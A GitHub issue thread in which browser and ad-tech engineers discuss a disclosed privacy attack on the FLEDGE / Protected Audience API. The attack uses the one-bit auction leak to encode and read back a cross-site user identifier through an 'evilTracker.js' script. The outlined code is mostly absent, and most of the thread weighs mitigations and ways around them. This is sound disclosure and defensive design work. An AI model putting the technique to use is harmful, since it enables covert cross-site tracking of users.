-
Notifications
You must be signed in to change notification settings - Fork 243
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Utilizing the 1-bit leak to build a cross site tracker #211
Comments
Interesting conceptual attack. This of course assumes no interference from other possible auction-scripts ("winner of the auction is the ad object which was given the highest score"). Since the results of runAdAuction are these:
...it seems also necessary to observe whether the ad in fact rendered or not? |
Thanks @jrmooring, this is indeed the natural fingerprinting concern associated with the one-bit leak, which FLEDGE will need to protect against in some way. As @lknik points out, this only works if the ads from There are generally two types of ways we can try to mitigate this sort of attack:
We certainly need some approach to this problem before the removal of third-party cookies in Chrome. |
Hello @michaelkleber and thanks for your replies. I wonder about some of its details.
So assuming that there's no competition - this may be used to tracking?
I reckon that some of this will need to be deployed. When would you start considering the final approach? 1-bit leak is somewhat waiting since ~2020 so I wonder when we have the prime time for the solution. Are there any options in your view, of trying to release Turtledove without any protections in place?
Happy to hear. API use auditing is among the recommendations I identify. But are you sure this is so easy in the case of a - in principle - fairly decentralised system? |
If there is no competition in the auction, and the buyer and seller collude, and the browser does not impose any sorts of mitigations, then the fingerprinting attack @jrmooring described would work. But of course there are many fingerprinting surfaces that browsers need to address, not just this one!
During the period where third-party cookies still exist, there is certainly value in giving developers a chance to experiment with an early and incomplete version of the FLEDGE API, so they can see how well it meets their goals. Unfortunately there is the risk that people might misunderstand and act as if the incomplete, abusable version of the API is the final version we plan to launch, so we'd need to weigh that against the developer benefit of getting to try things out sooner.
This is a good question, and I am definitely not sure; the decentralized nature does indeed make abuse detection harder. But in principle, aggregate data does seem sufficient to observe the sort of abuse we're talking about here. |
If you are looking to track users across your own properties there are simpler ways to do so that don't involve creating all of this complex logic, for example 1st party cookies and simple link decoration. |
Since interestGroup are buyer specific, we can assume that competition (diversity of ads) are directly in control of the buyer. Site owner can run private auction where only (N) interestGroups of specific buyer are participating, and leverage this flow to map userIds. It would be difficult for client-only logic to detect identify this attack. InterestGroup specific or outcome specific k-anon threshold may not be sufficient to prevent this. |
A small note: while there certainly could be colluding buyers and sellers, in this example there aren't any -- there's just a malicious tracking script abusing browser APIs. The simplest mitigation, plugging the one-bit leak, looks attractive to me. Give I'll preemptively note there could be a timing attack here (one that might also make abuse detection pretty challenging) -- instead of changing it's bid, |
@jrmooring Plugging the 1-bit leak is definitely the most appealing privacy measure! But ads that render inside Fenced Frames have some pretty substantial restrictions on how they can work — ultimately they will only get aggregate reporting, for example. With the 1-bit leak, ads that use FLEDGE targeting are subject to this new constraint, but regular contextually-targeted ads can keep working like they do today. If we make every ad render in a Fenced Frame, then any ad that competes against a FLEDGE ad ens up constrained, and understanding the impact on the ecosystem seems pretty hard. |
Well, you could also make the API not returning any data unless competition exists (that is, diversity of "buyers", so not just one is present). Maybe that could help in balancing the misuse surface? (* @michaelkleber ) |
@michaelkleber got it, totally understand the utility of the 1-bit leak, and at first take it sounds like a minor compromise to make in order to allow unmodified contextual ad competition. My intent in raising this issue isn't "hey here's another fingerprinting mechanism for the pile", but to illustrate a specific risk of the otherwise benign-sounding leak. @lknik I actually don't think the presence of competition from other buyers would hinder this technique. The malicious |
Yup, we're on the same page here. The question "is there real competition?" cannot just be based on whether there are other buyers in the auction, as you point out. But since the |
@michaelkleber That's an interesting point. With the most basic setup this technique does result in at most a single ad in the auction receiving a positive score. I can't think of a realistic benign scenario where that would occur. A number of ads, all with metadata indicating "bit N of the user identifier is on" could be added under different interest groups and buyer names, but positive score sparsity alone could still be a strong signal that With that in mind abuse detection starts to look more feasible, but still seems like a pretty huge piece of TBD infrastructure. This still leaves the timing attack -- if the time the auction takes to complete can be observed, then |
While it is interesting to track if N consistent ads are winning for a user and detect tracking behavior, could the detection be overcome by adding k more bits which shuffles outcome. Tracking JS could figure out the valid shuffle, while to browser, it may appear reasonably random. |
Are you sure? Wouldn't the sole guarantee of competition in this case - maybe - guarantee introducing a potential dose of some noise? All are scored, but if a number of "contenders" exists, it is maybe less guaranteed that the abusive player wins? I realize that the abusive-script searches for "ad.someUniqueField == N", but other contenders would simply bid or fight for a score on other grounds - it is not guaranteed that the scripts with "ad.someUniqueField == N" win, no? |
Introducing noise is certainly a worthwhile idea also! It offers a way to do prevention, not just detection. But in the attack @jrmooring described, the one bit just says whether or not the on-device auction produced any ad with score > 0. It's much much harder to use that channel if the auction includes any other ads with non-zero scores. There is the concern that there probably are some auction use cases where all ads come from the same buyer — check out #183 for example. But perhaps in that case @jrmooring is right and we could require that the contextual ad render in a Fenced Frame as well. |
Well, if the actual set ("tracking") bit was 0, and the auction still was run successfully (because of some other bidder) that would be a "false" bit 1 read, no? |
Agreed. And the easiest sort of noise the browser could add of its own accord would be to sometimes ignore a subset of the IGs, producing "false" bit 0 reads. |
It honestly feels like the better outcome would be to just have the contextual ad render in a fenced frame rather than add noise that will further compound with all the rest of the noise that will be added in the reporting chain already. If there's a path for a high fidelity solution, that remains private, I would take that every time. |
The notion of the ads ecosystem migrating to "All demand is able to render inside Fenced Frames" is extremely appealing to me also! I just don't know whether that is a realistic dependency given Chrome's timelines for third-party cookie removal. |
Migrating all or as much as possible ad demand (at the ad creative level) to some form of sandboxing of the ad itself (i.e. Fenced Frames) has so many positive benefits, data protection and otherwise, it is worth exploring even if it seems hard. |
Yes, completely agree that this should be a long-term goal of both all browsers and the whole ads ecosystem! I just expect that it will be slow enough that we (Chrome) don't want to wait until that has succeeded to remove 3p cookies. |
Well, you just got more time. So? :-) |
Hey @michaelkleber have read through this a few times now, think I understand better. I see how requiring everything to render in a single size FF would result in 0 marginal bits leaking, which would make re-identification within PAA impossible. I see how k-anon doesn't change this, and I see how my "728.1 x 89.9" idea is useless, at least w/o further variance that I can't quickly think of. Has There Been More Conversation on This?So I'm wondering what the latest thinking on this, and I suppose bit leaks in general (since what we've been discussing in #825 would add bits) is. In particular, curious about the noising "solutions", where I put quotes around solution to recognize that it would make it probabilistically harder, not mathematically impossible the way eliminating bit leaks would. I ask because it seems we could come up with an algorithm to make it challenging to reliably exfiltrate bits and therefore re-identify using that path, and if we could do that and it preserved important features for buyers and sellers, we might be able to get closer to a goal of "better privacy and better content" to incentivize adoption, than if we don't and ad tech migrates to other PII based solutions with designers and implementers who are less demanding on behalf of their users. Noise "Solution"Again, trying to tease out your thinking, what about something that tries to randomize for "suspicious cases" but also tries to recognize legitimate actors over time:
For trust of owners we could even do something PageRank'ish where we establish a graph of weighted connections by invites/bids/wins and do the thing where your trustedness is dependent on the trustedness of those who trust you, etc. (If we do this, I insist we call it PaaGERank, for "Protected Audience API Generally Esteemed Rank", or something similar). |
I'm so happy that this issue is being revisited again. So first of all, thank you for this post that resurfaced it. I'll add some cents below.
If I understand correctly, not much was said since the previous posts. There will be some more context added in a few weeks, but aside from that... Does this warrant a solution? In other words, may there be verifiable corner cases where there are not more than 1 bidders/buyers?
I'm not sure if I get this right. The ambigous-uses issue would be a reason to use more invasive PII-based approaches?
Why not make it simpler. In other words, runAdAuction with number of buyers less than X would always fallback to contextual non-adAuction process/ad as a result? |
More in a Few Weeks??!!In a few weeks??!! Sounds promising/mysterious! What I Meant: Maximizing PAA Privacy !== Maximizing Chrome User PrivacySo, to take a detour from bit leaks for a second... What I meant by the paragraph you highlighted was that making this solution maximally private doesn't help if it's not used and publishers shift to other solutions that are worse from a privacy, in particular re-identification across domain, perspective. If the cost of using PAA outweighs the benefit compared to other solutions we won't see adoption. Existing solutions this will be compared against include:
The idea of Privacy Preserving Ads based on opaque processing, Differential Privacy techniques, and hopefully on device processing so your data never leaves your machine, is promising. It will need adoption to succeed. Making this SuccessfulI think to make this successful we'll need to iterate towards that in a way that gets ad tech to use this solution rather than others. I think the existence of Event Level Reporting, Optional FF, and the indefinite-shelving of web bundles, all implicitly acknowledge that. I think other features, such as the multi-size tags discussed in #825 and multi tag auctions in #846 , are other examples that would help adoption but are in tension with minimizing bit leaks. It seems unlikely to me that we can't do a decent job of encouraging adoption by allowing feature use by billions of ad requests a day that are legitimate, while making abuse of those challenging but not mathematically impossible. Back to Bit LeaksGiven two extreme results:
I'd prefer (1), but reasonable minds might disagree, and that's why I'd like to understand these potential solutions better. Number Buyers < X --> No PAA AuctionMaybe! You are probably correct that an auction with one invited advertiser, as represented by a site, represented by the same ad tech, to bid, resulting in 1 bid, would be suspicious. However,
But, Maybe We Agree Directionally? :)That said, maybe you're implicitly agreeing that it's worth pursuing noising of leaked bits if the noise is sufficient and the number of bits is small? :) Addenda: Opaque On Device Processing vs Encrypted ID Based AdsIt's an interesting question whether a solution like PAA is better for privacy than one based on encrypted user IDs matched for audience creation. I hope the existence of this project suggests someone believes it is, so for the purposes of this conversation I'll assume it is and say it's worth trying to make it successful. |
Oh, I misunderstood then. Fair. I'm inclined to think that a proper tradeoff is pretty simple to find here, still.
All of non-standard and invasive approaches may eventually be cut via privacy-enhancing browser capabilities.
Let's wait those few weeks. |
Needless to say, I'm eager to see what Lukasz is teasing in a few weeks. But until then... I think the right solution here is the one we discussed above: getting the winning ad to render inside Fenced Frames, whether it comes from the Protected Audience auction or the competing contextual path. I can sort of imagine how we might extend that to the multi-sized banner feature request in #825: the contextual flow would need to return a fallback contextually-targeted ad of each size, so that the rendered ad size does not give away who won. But it's worse than that: the winning contextual ad wouldn't necessarily be the one with the highest bid or highest SSP score; the choice would need to be randomly noised by the browser. I expect the ads ecosystem will have a lot to chew on in deciding the cost-benefit analysis of running a multi-size auction if the cost is that the browser might sometimes choose a lower-scoring ad in order to noise the ad size. And I expect the researchers will have a field day trying to figure out whether there is actually a plausible noising scheme that will make this work. Perhaps we might be able to implement this kind of "noised multi-sized contextual fallback" system even while the 1-bit leak is still around: "If you want a multi-sized auction then you need fallback ads of each size that can render in Fenced Frames; if you want a contextually-targeted ad that cannot render in an FF then you must give up on the possibility of getting multiple sizes from the PA auction." Forcing the 1-bit leak off must happen eventually, but it would be great if that were a non-event because everyone had already chosen to voluntarily give it up in exchange for multi-size. |
This guy is a brilliant marketer, I'm hooked!
Gasp! Progress!
Yes, but if we're chewing together I am happy. I think if the sometimes could be responsive in some way to actual risk, established good behavior, etc, we could have a good chew. |
I'm curious to see whether the thinking here has evolved at all. I can see why there isn't much urgency around fixing this sort of leak when you still have a However, I don't think that the framing @thegreatfatzby used is where this discussion needs to end. The sort of incremental approach suggested makes sense from a deployment perspective, but privacy concerns me most here. With that approach, privacy protections don't start when third party cookies are removed, but when the last hole is plugged. This hole is pretty substantial. It provides fast, reliable access to cross-site information. It doesn't appear to be easy to detect abuse here (has anyone played 20 questions?). Rate limits and noise seem entirely infeasible. The seller-provided fallback ad is the only option that seems to have any hope of maintaining privacy properties. (That is, assuming that all the other explicitly temporary holes can also be patched...) |
Our recent work on Negative Targeting is the first step towards the endpoint that I think would make us all happy: contextually-targeted ad candidates flowing into the on-device final ad selection step as well. This architecture would also enable other use cases that need cross-site data, like global frequency capping. It is quite true that Chrome's removal of third-party cookies is not going to be enough to make things private. I don't think it makes sense to insist that 3PCs should be the last tracking vector to go away; indeed that hasn't been the case in any other browser either. |
First of all, my more elaborate input on this topic should be clearer in two weeks or so.
I agree that this should be addressed; the most straight-forward way seems to be the creation of a process of displaying the output in same frame(s).
I'm also greatly concerned with privacy design. However, for this part I'm concerned with shipping this whole PAA thing at all. And perhaps for this reason - as you mention, initially not all precautions are deployed - perhaps it is strategically better to ship the whole project and work on top of it incrementally. While this is not ideal, it is something.
I'm also concerned that abuse detection would be difficult, though if there's enough bidders, in principle the risk should be limited "in the crowd of bids". |
Hey @martinthomson just want to tease out what you're saying a bit: FramingWhich part of the framing are you referring to as being "not the end", and by extension what are you wanting as "yes the end" :) ? Are you thinking mostly about the ability to re-identify across contexts reliably at scale, or does your end state include more constraints like "novel inference", "any inference", "any usage of signals across domain", or even "provably non-identifiable across contexts"? (Relevant would be any thoughts you might have here). Incremental ApproachDo you mean the incremental approach Sandbox is taking overall, or the piece I'm saying about wanting to get adoption? Just to clarify a few things on my end
|
The framing I wanted to push back on slightly was the two part line:
Both are reasonable, but they come from a position I don't recognize as having much legitimacy here (not zero, just not much). I don't accept the threat of people doing worse things for privacy as a reason to weaken protections as a general rule. That wasn't your argument, but even when you pair that with the idea that those weaker protections will eventually be phased out, I can't really accept that. Chrome users suffer today with respect to privacy because they are tracked in a way that is both easy and effective, but that is not true of most other people. When you look at those people who aren't using Chrome as a baseline, making a proposal that is already extraordinarily difficult to adopt marginally less difficult to adopt at the cost of effectively removing key technical protections makes that proposal a non-starter from a privacy perspective. That is, I don't see changes here as changing the adoption cost in a meaningful way, and certainly not relative to the privacy cost associated with retaining this leak. (I'm still noodling on the negative targeting thing. The design is distinctly weird and the explainer doesn't do a great job of laying out the rationale. I'm in the process of working through some guesses and coming up short.) |
@martinthomson points all taken, some of which I'll try to parse a bit more. I'll also try to read your negative targeting comment when I can. That said, I want to dig on one thing: what are the privacy threats you want to protect against? I promise I've done my best to read FF blogs and other things (I sent in a request to take FFs privacy course but never heard back :) ), but I don't understand what you mean by "tracked easily and effectively" in a way that allows me to try to problem solve. In Chrome's Attestation and original model they refer to "re-identification across contexts", but I'm sensing you want to protect against more than that? |
@thegreatfatzby the privacy threat here remains the same cross-context re-identification one. One thing that concerns me about this particular leak is that while it is a single bit, the rich IG selection functions (priority, the cap on numbers) gives the seller a lot of control over what IGs are considered in any given auction. That's a feature, for sure, but it also means that when an auction fails, that produces information that is controlled through those IG selection functions. Therefore, repeated auctions can be used to produce new information with each failure or success. In essence, I consider the existence of failures to create a querying function on a cross-site database that releases one bit at a time (hence the reference to the game of 20 questions). I don't regard Chrome's attestation as a meaningful safeguard against this, but it is notably the only protection that currently exists. It constrains good actors, which has some value, but I care more about what this does for all actors, including the bad ones. (I think that I'm following the FF=Firefox vs. FF=fenced frame abbreviations. I didn't realize that Mozilla conducted privacy courses though. Maybe I should sign up for one.) |
Hey Martin, I am mostly in agreement with you: The one-bit-per-auction leak, with a very rich an attacker-controlled mechanism for picking the bit, could absolutely be used to exfiltrate cross-site identifiers. The registration-and-attestation regime is the only thing that acts as any protection against it. However, my analysis is different from yours in one place>
The core reason for initially launching with the one-bit leak isn't actually "people who adopt will need to do slightly less work". Rather, it means fewer parties need to adopt the new APIs. If we required even contextually-targeted ads to flow into the on-device auction and be rendered in Fenced Frames, then it would be impossible for ads targeted/rendered the new way and ads targeted/rendered the old way to even compete against each other in an auction. Instead every individual ad auction would either use the new APIs or targeting based on context / first-party data / etc. That is, the one-bit leak is about not requiring Fenced Frame adoption from parties that don't care about the new API at all. I do believe that the right solution is to put all ads into Fenced Frames, eventually. And yes that does mean having everyone adopt the FF rendering flow, aggregate reporting, and so on. If Firefox feels the 1-bit leak is unacceptable even temporarily, then the way to square that circle probably is to hold off on implementing PA until the ads ecosystem is able to function in everything-in-Fenced-Frames mode. PATCG is already running this playbook for aggregate attribution reporting: working towards cross-browser standardization of an API which the thing launched in Chrome will need to evolve into over time. We're happy to do it here too. But we're also happy to start with our current proof-of-concept, gain implementer experience and ecosystem buy-in, and — even though I understand you're skeptical of this last bit — get some interim privacy improvement by removing 3rd-party cookies... even while we retain this tracking risk that people are attesting they won't use. |
Thanks for the added context @michaelkleber, that is very helpful. I hadn't really thought of it that way, but it is somewhat more than a simple tweak. I don't necessarily agree about the nature of the trade-off, but I acknowledge that it is a reasonable position. Especially from where you stand. And yeah, where we each stand is so different that maybe it doesn't make sense to reach alignment on this point. But I think we're fairly well aligned on where we want to be standing, at least broadly. So while we have a difference of opinion on how we get there, I don't want that to stop you from doing something meaningful for those people who made the choice to use your browser. As you say, it's unlikely that Firefox would be able to adopt this in its current form anyway. I'm mostly poking at this from the perspective of trying to find the shape of the thing that we might want to consider. Happy to learn that maybe this is not the inflection point on which that decision would turn. One thing that might be worth noting is that the explainer uses the phrase "As a temporary mechanism". That phrase is not connected to any of the discussion about auction failures. Would it make sense to do that, or do you consider this to be something that will operate on a different timescale to the others such that you don't want to identify it that way? |
That is correct, assuming that there's only a single bidder involved. Is it reasonable to assume this? This is also why I suggest not running algorithmic auctions unless there are not more than X bidders/buyers involved.
But that's a fuzzy database with randomness involved. It isn't clear how to do this deterministically. And it would cost money to do so, no? |
I'm not assuming that. At a minimum, I am assuming that it is trivial to create the semblance of multiple buyers/bidders when they are not in fact distinct entities. That is an extension of the standard Web threat model assumption that it is easy to create a new website. So I don't think there is any protective value in setting a minimum degree of participation.
I don't see a source of randomness or a monetary cost involved. |
I see. Yes, and I agree. I explained a similar/same risk somewhere around some time ago. Putting it all together we have the following attack scenario:
The outcome should take into account those three points, and that is the minimum.
If you have X and Y buyers that do their jobs, can the controller of X execute a scheme deterministically? |
The party running the auction (seller) gets to choose which parties (buyers) they invite to participate. That seems like a non-negotiable requirement, because these parties need to have some mechanism in place to exchange money with each other. But this surely does mean, as Martin says, that a malicious seller could hold an auction with only the malicious buyers, and no honest buyers adding noise. And while the browser expects there to be monetary cost associated with winning an auction (because the publisher gets paid somehow), certainly the money is not flowing through the browser itself, so we have no way to check that it really happened. As I said before, the right way to fix this is to not leak the bit — that is, for even the non-IG-related ads to flow into the protected auction, as we have started allowing with the Negative Targeting mechanism. We'll get there. |
Ah yes, the publisher/seller is also in the threat model. So it must all be displayed in the same frame. No room to require the web browser to request a predetermined number of buyers? Alternatively, and I think it was considered somewhere around here, implementing restricted IGs (ones in which only certain buyers may bid). But in general it's best to display it all in same frame and move on.
Let's see how this goes! |
Hello,
I'm opening this issue to call out a specific technique that may be straightforward and reliable to use for cross site tracking with FLEDGE, to determine if it is in fact viable, and if it is, what changes to FLEDGE could prevent this technique from functioning.
Say we have an
evilTracker.js
that hasregisterId()
andgetId()
functions:registerId
registerId()
encodes an N bit identifier by joining an interest group for every 'on' bit. Example:Note that
biddingLogicUrl
'sgenerateBid
function is a passthrough:getId
Now in
getId()
evilTracker.js
can use N auctions to query the user's ID:With
checkBitN.js
having the following implementation:The text was updated successfully, but these errors were encountered: